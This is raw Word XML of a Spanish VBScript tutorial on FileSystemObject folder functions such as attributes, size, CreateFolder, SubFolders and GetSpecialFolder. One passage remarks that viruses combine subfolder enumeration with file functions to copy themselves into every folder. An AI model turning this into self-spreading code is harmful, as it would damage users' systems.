        <w:ind w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Para colocar uno o mas atributos se suman los siguientes valores según los atributos que queramos darle a la carpeta en cuestión: Solo lectura (valor 1), Oculto (valor 2) y Sistema (valor 4).</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ejemplo se le da el valor 3 lo cual significa que se le han dado los atributos de Solo lectura y Oculto </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">(1+2=3). </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Esta función también se puede usar para saber los atributos de una carpeta, asignándola a una variable (los valores que devuelve siguen los patrones explicados anteriorment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3197"/>
        <w:jc w:val="left"/>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197"/>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arc = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>fso.GetFolder</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">("c:\carpeta") </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>arc.Attributes = 3</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Para ver los atributos de una carpeta, haz clic en el botón derecho en ella y elige propiedades, luego busca este recuadro, que esta abajo de todo:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="280" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1656"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3390900" cy="1151890"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6950" name="Picture 6950"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="6950" name="Picture 6950"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3390900" cy="1151890"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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quin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 xml:space="preserve">. Esta función devuelve un valor que indica el tamaño en bytes de una carpeta y todo su contenido. Para que no aparezcan números muy grandes, dividiéndolo entre 1020 lo pasamos a Kbytes y con la función Fix le quitamos los decimales. La variable tamano guarda los datos obtenidos. En definitiva, es exactamente igual que la que usamos con archivos, pero poniendo </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>GetFolder</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> en vez de </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>GetFile</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> en la línea 2, ya que lo que queremos es la estructura de una carpeta.</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
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Set</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> fso = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>CreateObject(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="000000"/>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4341"/>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arc = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>fso.GetFolder</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>("c:\carpeta") tamano = fix(arc.</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1020)</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x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un</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Esta función abre la carpeta que le indiquemos. La sintáis "c:\carpeta" indica la ruta y la carpeta que se va a ejecutar. Con esta función también podemos </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>abrir páginas web</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. Es exactamente igual que la usada con archivos.</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942"/>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 ws</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">.Run </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>"c.\carpet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ptim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CreateFolder</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Esta función crea la carpeta que le indiquemos. La sintaxis "c:\carpeta" indica la ruta y la carpeta que se va a crear. En este ejemplo se </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>creara</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> una </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">carpeta </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>llamada carpeta</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> en el disco duro c. Es recomendable comprobar antes si existe o no la carpeta para no sobrescribirla.</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CreateFolder </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>"c:\carpet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octava</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> es una mezcla de varias que he echo yo para facilitar los datos. (En realidad es la función </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>SubFolders</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> que indica todas las subcarpetas de una carpeta en una </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>colección</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Yo lo que he echo es pasar esa colección a una variable normal.) Esta función crea una lista de subcarpetas de la carpeta que le indiquemos y la guarda en la variable </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ListaCarpetas</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. La sintaxis "c:\carpeta" indica la ruta y la carpeta de la que se va a sacar esa lista. Cada subcarpeta va en una línea diferente. Así, se puede guardar esos datos en un archivo y luego ir leyéndolos línea por línea para operar en todas las subcarpetas. Este es el método que, combinado con la función Files, utilizan algunos virus para copiarse en todas las carpetas del ordenador. No olvidemos la explicación dada en el tratamiento de archivos para recordar de que otra manera se puede usar este bucle For, y lo que significa el siguiente código en realidad (y lo que se puede hace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car = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>fso.GetFolder</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>("c:\carpet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sc = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>car.</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>SubFolders</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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or Each </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 xml:space="preserve"> in sc</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ListaCarpetas = ListaCarpetas&amp;</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name&amp;</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13)</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322"/>
        <w:ind w:left="93"/>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 xml:space="preserve">La novena y </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">es la función </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>GetSpecialFolder</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Esta función da la ruta de las carpetas especiales de Windows que le indiquemos. El valor 1 indica la carpeta que queremos que nos devuelva. Escribiremos </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> si queremos que nos devuelva el directorio de Windows, pondremos </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> si queremos que nos devuelva la carpeta de sistema y </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> si queremos la carpeta tempora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1395"/>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08" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="17" w:right="1395"/>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c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SpecialFolder</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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1</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w: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Recuerdo que el resultado de la función (lo que recibe arc) es la estructura de dicha carpeta, y por lo tanto, es lo mismo (en este ejemplo) que poner </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Set</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>car</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>fso</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.GetFolder</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>“C:\Windows\System32</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. La utilidad de esta función es que si han cambiado la ruta de instalación de Windows (p.ej. hay ordenadores con WinNT, Win98, WinXp y cosas por el estilo) o la carpeta temporal o la del sistema, esta función siempre te da la buena, y así no hay error posible. Si lo que queremos saber es la ruta completa debemos hacer lo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0" w:line="259" w:lineRule="auto"/>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c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SpecialFolder</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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1</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b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>car</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.Path</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp; “\” &amp; </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>car</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.Nam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unción </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Name</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> me parece que la he explicado, devuelve el </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>nombre del archivo o carpeta</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> en cuya estructura se haga la función (en este caso devolvería System o System32, por tratarse ese del nombre de la carpeta del sistema, pero con archivos puede devolver Doc2.txt o cosas así), y es tanto de </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>lectura como de escritura</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> (se puede obtener el nombre de la carpeta o archivo como en el ejemplo, o cambiarlo con </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>car.Name</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> = “Pepe”</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">) . </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Path</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
